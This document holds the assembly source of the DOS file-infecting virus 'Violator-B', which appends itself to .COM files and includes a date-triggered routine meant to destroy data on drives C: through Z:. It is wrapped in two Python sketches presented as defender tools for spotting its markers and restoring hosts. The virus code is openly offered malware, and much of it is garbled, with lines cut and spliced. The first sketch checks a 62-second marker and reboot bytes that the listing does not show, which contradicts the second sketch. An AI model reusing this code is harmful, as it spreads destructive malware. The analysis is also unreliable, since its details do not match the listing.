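A defender's view of the traces the listing above leaves, as an added example that is not part of the original issue: it checks a .COM image for the 62-second time stamp, the five REBOOT_ bytes, and the appended-code layout (leading jmp, patched VIR_DAT reference, saved first three bytes), then rebuilds the host. The function names and the sample image are constructed here; the offsets assume the data-area order shown in the listing and the jmp displacement of file size minus 3 described in its comments.

```python
import struct

# Values taken from the listing above; the function names are this example's own.
REBOOT_STUB = bytes([0xEA, 0xF0, 0xFF, 0xFF, 0xFF])   # REBOOT_ data bytes
MIN_HOST, MAX_HOST = 0x0A, 0xFA00                     # DTA_LEN window the listing accepts
# Offsets inside the data area: five saved words (10 bytes), then FIRST3_, JMPOP_, JMPDSP_.
FIRST_3_OFF, JMP_OP_OFF, JMP_DSP_OFF = 10, 13, 14


def has_62s_marker(dos_time):
    """True when the packed DOS time word carries the impossible 62-second value."""
    return (dos_time & 0x1F) == 0x1F           # seconds are stored in 2-second units


def inspect_com(data, dos_time=None):
    """Check one .COM image (and optionally its DOS time word) for the listing's traces."""
    report = {
        "marker_62s": dos_time is not None and has_62s_marker(dos_time),
        "reboot_stub": data[:5] == REBOOT_STUB,
        "appended_layout": False,
        "host_size": None,
        "original_first3": None,
    }
    if len(data) < 3 or data[0] != 0xE9:        # infected hosts start with a near jmp
        return report
    disp = struct.unpack_from("<H", data, 1)[0]
    entry = (disp + 3) & 0xFFFF                 # file offset the jmp lands on = old host size
    if not MIN_HOST <= entry <= MAX_HOST or entry + 4 > len(data):
        return report
    if data[entry] != 0x51 or data[entry + 1] != 0xBA:    # push cx / mov dx,imm16
        return report
    # The imm16 was patched to (host size + code length + 100h); undo the .COM load offset.
    vir_dat = struct.unpack_from("<H", data, entry + 2)[0] - 0x100
    if vir_dat < entry + 4 or vir_dat + JMP_DSP_OFF + 2 > len(data):
        return report
    stored_disp = struct.unpack_from("<H", data, vir_dat + JMP_DSP_OFF)[0]
    if data[vir_dat + JMP_OP_OFF] != 0xE9 or stored_disp != disp:
        return report
    report["appended_layout"] = True
    report["host_size"] = entry
    report["original_first3"] = bytes(data[vir_dat + FIRST_3_OFF:vir_dat + FIRST_3_OFF + 3])
    return report


def restore_host(data, report):
    """Rebuild the pre-infection image: saved first 3 bytes plus the untouched host body."""
    if not report["appended_layout"]:
        raise ValueError("layout not recognised; nothing to restore")
    return report["original_first3"] + bytes(data[3:report["host_size"]])


def constructed_sample():
    """Constructed test image: same layout, zero filler instead of any virus code."""
    host = bytes([0xB8, 0x00, 0x4C, 0xCD, 0x21]) + b"\x90" * 27   # 32-byte harmless host
    filler = 20                                                   # stands in for the code
    vir_dat = len(host) + 4 + filler
    disp = len(host) - 3
    tail = bytes([0x51, 0xBA]) + struct.pack("<H", vir_dat + 0x100) + b"\x00" * filler
    tail += b"\x00" * 10 + host[:3] + b"\xE9" + struct.pack("<H", disp)
    image = b"\xE9" + struct.pack("<H", disp) + host[3:] + tail
    return host, image


if __name__ == "__main__":
    host, image = constructed_sample()
    stamp = (12 << 11) | (30 << 5) | 0x1F       # constructed time word, 12:30:62
    result = inspect_com(image, stamp)
    print(result)
    print("restored == host:", restore_host(image, result) == host)
```

The cross-check between the leading jmp and the copy stored in the data area is what keeps ordinary .COM files that merely begin with a jmp from matching.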


------------------------------------------------------------------------------


                  nOW HERE'S THE SOURCE FOR vIOLATOR-b


------------------------------------------------------------------------------
;
*****************************************************************************
;

;- sTRAIN b
;

;*****************************************************************************
;
; (aUG/09/90)
;

; dEVELOPMENT nOTES:
;

;  i ENCOUNTERED SEVERAL ERRORS IN THE ORIGINAL vIOLATOR CODE WHICH i

;    CORRECTED IN THIS VERSION. mAINLY, THE int 26 ROUTINE TO FUCK THE

;     DISK. iT SEEMS THAT THE ROUTINE WOULD CRASH RIGHT AFTER THE int 26

;    WAS EXECUTED AND THE WHOLE PROGRAM WOULD DIE. i HAVE SINCE FIXED

;      THIS PROBLEM IN THIS VERSION WITH AN int 13, ah 05 (fORMAT tRACK)

;     COMMAND. tHIS WOE SUBSEQUENT int 26.
;
;

;*****************************************************************************
;
;                        wRITTEN BY - tHE hIGH eVOLUTIONARY -
;
;                                rabid hEAD pROGRAMMER
;
;
;                                rEVISED BY: oNSLAUGHT
;
;                               nO AFFILIATION WITH RABiD
;
;
;               cOPYRIGHT (c) 1990 BY rabid nAT'NL dEVELOPMENT cORP.
;

;*****************************************************************************


mov_cx  macro
segment  assume ds:code,ss:code,cs:code,es:code

org     $+0100h               ; sET org TO 100h PLUS OUR OWN


vcode:  jmp     VIRUS


nop

nop

nop                              ;15 nop'S TO PLACE jmp hEADER

nop

nop

nop

nop

nop

nop

nop

nop

nop

nop

nop

nop


V_START EQU     $



VIRUS:
       push    cx

       mov     dx,offset
VIR_DAT

       cld

       mov     si,dx

       add     si,FIRST_3

       mov     cx,3

       mov        IT'S dos 1.0

       jnz
DOS_OK
        jmp     QUIT


DOS_OK: push    es

        mov     ah,2fh

        int     21h

        mov     [si+OLD_DTA],bx

        mov     [si+OLD_DTS],es

        pop     es

        mov     dx,DTA                  

        add     dx,si                    

        mov     ah,1ah

        int     21h                     

        push    es
        push    si

        mov     es,ds:2ch

        mov     di,0                    

        jmp     YEAR_CHECK


YEAR_CHECK:
       ah,2ah
        ;cALL dos

        cmp     cx,1990                 ;cHECK TO SEE IF THE YEAR IS 1990

        jge     MONTH_CHECK             ;iF GREATER OR EQUAL, CHECK MONTH

        jmp     FIND_PATH               ;iF NOT, GO ON WITH INFECTION


MONTH_CHECK:

        mov     ah,2ah                  ;gET DATE INFO

        int     21H                     ;cALL dos

        cmp     dh,10                   ;cHECK TO SEE IF IT IS sEPTEMBER

        jge     DAY_CHECK               ;iF GREATER O

        jmp     FIND_PATH  :-z:

        jmp     FIND_PATH               ;iF NOT, THEN GO ON WITH INFECTION


MULTIPLEX:

        mov     al,CNTR                 ;cOUNTER IS THE DRIVE TO KILL

        call    ALTER                   ;gO AND KILL THE DRIVE

                                        ;25 IS DRIVE z:

        cmp     CNTR,25                 ;iS (CNTR) 25 ?

        je      FIND_PATH               ;gO ON WITH INFECTION

        inc     CNTR                    ;aDD ONE TO (CNTR)

        loop    MULTIPLEX               ;lOOP BACK UP TO KILL EXT DRIVE


ALTER:

                                        ;rETURN UP FOR NEXT DRIVE


FIND_PATH:

        pop     si

        push    si

        add     si,ENV_STR

        lodsb

        mov     cx,offset 8000h

        repnz   scasb

        mov     cx,4


CHECK_NEXT_4:

        lodsb

        scasb

        ;

     ; tHE jnz LINE SPECIFIES THAT IF THERE IS NO path PRESENT, THEN WE WILL GO

     ; ALONG AND INFECT THE root DIRECTORY ON THE DEFAULT DRIVE.
;

        jnz     FIND_PATH               ;iF NOT PATH, THEN GO TO root DIR

        loop    CHECK_NEMORE CHARS
        pop     si                  ;lOAD IN path AGAIN TO LOOK FOR CHARS
        pop     es
        mov     [si+PATH_AD],di
        mov     di,si
        add     di,WRK_SPC              ;pUT THE FILENAME IN WRK_SPC
        mov     bx,si
        add     si,WRK_SPC
        mov     di,si
        jmp     short   SLASH_OK

SET_SUBDIR:
        cmp     word ptr [si+PATH_AD],0
        jnz     FOUND_SUBDIR
        jmp     ALL_DONE


FOUND_SUBDIR:
        push    ds
        push
  si
        mov     ds,



mov     di,si
        mov     si,es:[di+PATH_AD]
        add     di,WRK_SPC              ;di IS THE FILE NAME TO INFECT! (HEHE)


MOVE_SUBDIR:
        lodsb                           ;tO TEDIOUS WORK TO MOVE INTO SUBDIR
        cmp     al,';'                  ;dOES IT END WITH A ; CHARACTER?
        jz      MOVED_ONE               ;IF YES, THEN WE FOUND A SUBDIR
        cmp     al,0                    ;IS IT THE END OF THE PATH?
        jz      MOVED_LAST_ONE          ;IF YES, THEN WE SAVE THE path
       



 stosb                           ;MARKER INTO di FOR FUTURE REFERENCE
        jmp     short   MOVE_SUBDIR

MOVED_LAST_ONE:
        mov     si,0

MOVED_ONE:
        pop     bx                      ;bx IS WHERE THE VIRUS DATA IS
        pop     ds                      ;rESTORE ds SO THAT WE CAN DO STUPH
        mov     [bx+PATH_AD],si         ;wHERE IS THE NEXT SUBDIR?
        nop
        cmp     ch,'\'                  ;cHECK TO SEE IF IT ENDS IN \
        jz      SLASH_OK                ;iF YES, THEN IT'S ok
        mov     al,'\'                  ;IF NOT, THEN ADD ONE...
        stosb                           ;STORE THE SUCKER


SLASH_OK:
        mov     [bx+NAM_PTR],di         ;mOVE THE FILENAME INTO WORKSPACE
        mov     si,bx                   ;rESTORE THE ORIGINAL si VALUE
        add     si,F_SPEC               ;pOINT TO com FILE VICTIM
        mov     cx,6
        repz    movsb                   ;mOVE VICTIM INTO WORKSPACE
        mov     si,bx
        mov     ah,4eh
        mov     dx,WRK_SPC
        add     dx,si     



              ;dx IS ... the victim!!!
        mov     cx,3                    ;aTTRIBUTES OF rEAD oNLY OR hIDDEN ok
        int     21h
        jmp     short   FIND_FIRST

FIND_NEXT:
        mov     ah,4fh
        int     21h

FIND_FIRST:
        jnb     FOUND_FILE              ;jUMP IF WE FOUND IT
        jmp     short   SET_SUBDIR      ;oTHERWISE, GET ANOTHER SUBDIRECTORY

FOUND_FILE:
        mov     ax,[si+DTA_TIM]         ;gET TIME FROM dta
        and     al,1eh                  ;mASK TO REMOVE ALL BUT SECONDS
        cmp     al,1eh                  ;60 SECONDS
        jz      FIND_NEXT
        cmp     word ptr [si+DTA_LEN],offset 0fa00h ;iS THE FILE TOO LONG?
        ja      FIND_NEXT               ;iF TOO LONG, FIND ANOTHER ONE
        cmp     word ptr [si+DTA_LEN],0ah ;iS IT TOO SHORT?
        jb      FIND_NEXT               ;tHEN GO FIND ANOTHER ONE
        mov     di,[si+NAM_PTR]
        push    si
        add     si,DTA_NAM

MORE_CHARS:
        lodsb
        stosb
        cmp     al,0
        jnz     MORE_CHARS
        pop     si
        mov     ax,offset 4300h
        mov     dx,WRK_SPC
        add     dx,si
        int     21h
        mov     [si+OLD_ATT],cx
        mov     ax,offset 4301h
        and     cx,offset 0fffeh
        mov     dx,WRK_SPC
        add     dx,si
        int     21h
        mov     ax,offset 3d02h
        mov     dx,WRK_SPC
        add     dx,si
        int     21h
        jnb     OPENED_OK
        jmp     FIX_ATTR

OPENED_OK:
        mov     bx,ax
        mov     ax,offset 5700h
        int     21h
        mov     [si+OLD_TIM],cx         ;sAVE FILE TIME
        mov     [si+OL_DATE],dx         ;sAVE THE DATE
        mov     ah,2ch
        int     21h
        and     dh,7
        jmp     INFECT

INFECT:
        mov     ah,3fh
        mov     cx,3
        mov     dx,FIRST_3
        add     dx,si
        int     21h             ;sAVE FIRST 3 BYTES INTO THE DATA AREA
        jb      FIX_TIME_STAMP
        cmp     ax,3
        jnz     FIX_TIME_STAMP
        mov     ax,offset 4202h
        mov     cx,0
        mov     dx,0
        int     21h
        jb      FIX_TIME_STAMP
        mov     cx,ax
        sub     ax,3
        mov     [si+JMP_DSP],ax
        add     cx,offset C_LEN_Y
        mov     di,si
        sub     di,offset C_LEN_X

        mov     [di],cx
        mov     ah,40h
        mov_cx  VIRLEN
        mov     dx,si
        sub     dx,offset CODELEN
        int     21h
        jb      FIX_TIME_STAMP
        cmp     ax,offset VIRLEN
        jnz     FIX_TIME_STAMP
        mov     ax,offset 4200h
        mov     cx,0
        mov     dx,0
        int     21h
        jb      FIX_TIME_STAMP
        mov     ah,40h
        mov     cx,3
        mov     dx,si
        add     dx,JMP_OP
        int     21h

FIX_TIME_STAMP:
        mov     dx,[si+OL_DATE]
        mov     cx,[si+OLD_TIM]
        and     cx,offset 0ffe0h
        or      cx,1eh
        mov     ax,offset 5701h
        int     21h
        mov     ah,3eh
        int     21h

FIX_ATTR:
        mov     ax,offset 4301h
        mov     cx,[si+OLD_ATT]
        mov     dx,WRK_SPC
        add     dx,si
        int     21h

ALL_DONE:
        push    ds
        mov     ah,1ah
        mov     dx,[si+OLD_DTA]
        mov     ds,[si+OLD_DTS]
        int     21h
        pop     ds

QUIT:
        pop     cx
        xor     ax,ax                   ;xor VALUES SO THAT WE WILL GIVE THE
        xor     bx,bx                   ;POOR SUCKER A HARD TIME TRYING TO
        xor     dx,dx                   ;REASSEMBLE THE SOURCE CODE IF HE
        xor     si,si                   ;DECIDES TO DISASSEMBLE US.
        mov     di,offset 0100h
        push    di
        xor     di,di
        ret     0ffffh                  ;rETURN BACK TO THE BEGINNING
                                        ;OF THE PROGRAM

VIR_DAT equ     $

INTRO   DB      '.d$^I*&b)_A.%r',13,10
OLDDTA_ dw      0
OLDDTS_ dw      0
OLDTIM_ dw      0
COUNT_  dw      0
CNTR    db      2                               ; dRIVE TO NUKE FROM (c:+++)
OLDATE_ dw      0
OLDATT_ dw      0
FIRST3_ equ     $
        int     20h
        nop
JMPOP_  db      0e9h
JMPDSP_ dw      0
FSPEC_  db      '*.com',0
PATHAD_ dw      0
NAMPTR_ dw      0
ENVSTR_ db      'path='
WRKSPC_ db      40H DUP (0)
DTA_    db      16H DUP (0)
DTATIM_ dw      0,0
DTALEN_ dw      0,0
DTANAM_ db      0dH DUP (0)
LST_BYT equ     $
VIRLEN  =       LST_BYT - V_START
CODELEN =       VIR_DAT - V_START
C_LEN_X =       VIR_DAT - V_START - 2
C_LEN_Y =       VIR_DAT - V_START + 100h
OLD_DTA =       OLDDTA_ - VIR_DAT
OLD_DTS =       OLDDTS_ - VIR_DAT
OLD_TIM =       OLDTIM_ - VIR_DAT
OL_DATE =       OLDATE_ - VIR_DAT
OLD_ATT =       OLDATT_ - VIR_DAT
FIRST_3 =       FIRST3_ - VIR_DAT
JMP_OP  =       JMPOP_  - VIR_DAT
JMP_DSP =       JMPDSP_ - VIR_DAT
F_SPEC  =       FSPEC_  - VIR_DAT
PATH_AD =       PATHAD_ - VIR_DAT
NAM_PTR =       NAMPTR_ - VIR_DAT
ENV_STR =       ENVSTR_ - VIR_DAT
WRK_SPC =       WRKSPC_ - VIR_DAT
DTA     =       DTA_    - VIR_DAT
DTA_TIM =       DTATIM_ - VIR_DAT
DTA_LEN =       DTALEN_ - VIR_DAT
DTA_NAM =       DTANAM_ - VIR_DAT
COUNT   =       COUNT_  - VIR_DAT

        code    ends
end     vcode
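
From a defender's side, the listing leaves two checkable traces: FIX_TIME_STAMP forces the seconds field of the file time to 1Eh (60 seconds, a value DOS never writes on its own), and INFECT rewrites the first three bytes to an E9 jump that lands on the old end of file. The sketch below is an added example, not part of the original listing; it assumes the raw FAT directory entry layout (time word at offset 22, size at offset 28), and `make_dirent`, `dos_time`, `triage`, the result labels and the sample entries are hypothetical or constructed.

```python
import struct

def make_dirent(name, ext, time_word, size):
    """Build a constructed 32-byte FAT directory entry (sample data only)."""
    e = bytearray(32)
    e[0:11] = name.ljust(8).encode("ascii") + ext.ljust(3).encode("ascii")
    struct.pack_into("<H", e, 22, time_word)   # last-write time word
    struct.pack_into("<I", e, 28, size)        # file size in bytes
    return bytes(e)

def stamp_is_marked(time_word):
    """Same test the listing runs at FOUND_FILE: and al,1eh / cmp al,1eh."""
    return (time_word & 0x1E) == 0x1E

def entry_jump_target(head):
    """File offset reached by a leading E9 rel16 jump, or None."""
    if len(head) < 3 or head[0] != 0xE9:
        return None
    return (struct.unpack_from("<H", head, 1)[0] + 3) & 0xFFFF

def triage(entry, head):
    """Classify one directory entry plus the first bytes of its file."""
    ext = entry[8:11].decode("ascii").rstrip().upper()
    time_word = struct.unpack_from("<H", entry, 22)[0]
    size = struct.unpack_from("<I", entry, 28)[0]
    if ext != "COM" or not stamp_is_marked(time_word):
        return "no-marker"
    target = entry_jump_target(head)
    # INFECT stores (old length - 3) as the displacement, so the jump lands
    # on the old end of file: inside the grown file and within the
    # 0Ah..0FA00h size window the listing accepts.
    if target is not None and 0x0A <= target <= 0xFA00 and target < size:
        return "suspect"
    return "odd-timestamp"

def dos_time(h, m, field):
    """Pack hours, minutes and the raw 5-bit seconds field."""
    return (h << 11) | (m << 5) | field

# Constructed samples: (directory entry, first three bytes of the file).
SAMPLES = [
    (make_dirent("EDIT", "COM", dos_time(12, 30, 5), 2000), b"\xe9\x10\x00"),
    (make_dirent("TOOL", "COM", dos_time(12, 30, 0x1E), 1700), b"\xe9\xe5\x03"),
    (make_dirent("MENU", "COM", dos_time(9, 15, 0x1E), 900), b"\xb4\x09\xcd"),
]

if __name__ == "__main__":
    for entry, head in SAMPLES:
        print(entry[0:8].decode("ascii").rstrip(), triage(entry, head))
```

The "odd-timestamp" result matters because every failure branch in INFECT also falls through FIX_TIME_STAMP, so a file can carry the marker without the appended body.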

------------------------------------------------------------------------------
             


